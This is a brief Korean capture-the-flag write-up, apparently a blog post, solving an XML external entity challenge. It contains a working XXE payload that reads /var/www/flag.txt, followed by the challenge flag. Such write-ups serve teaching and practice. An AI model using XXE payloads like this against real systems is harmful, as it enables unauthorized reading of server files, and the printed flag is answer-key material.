1. 개요
XML external entity attack(xml 외부 엔티티 공격) 문제
참고 자료
2. 풀이
1) 분석
사이트를 둘러보면 xml를 업로드하고, 확인할 수 있습니다.
2) XML 외부 엔티티 공격
flag는 /var/www 에 있다고 했습니다. 해당 경로를 읽어줍니다.
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///var/www/flag.txt"> ]>
<root>
<data>&xxe;</data>
</root>3) 결과
3. flag
flag{639b72f2dd0017f454c44c3863c4e195}'CTF' 카테고리의 다른 글
| [b01lers CTF] gambler baby (0) | 2022.06.06 |
|---|---|
| [b01lers CTF] I Love Java (0) | 2022.06.06 |
| [NahamCon_CTF_2022] personnel (0) | 2022.06.06 |
| [Patriot CTF] Spongebob (0) | 2022.06.06 |
| [Patriot CTF] Rock and Roll (0) | 2022.06.06 |
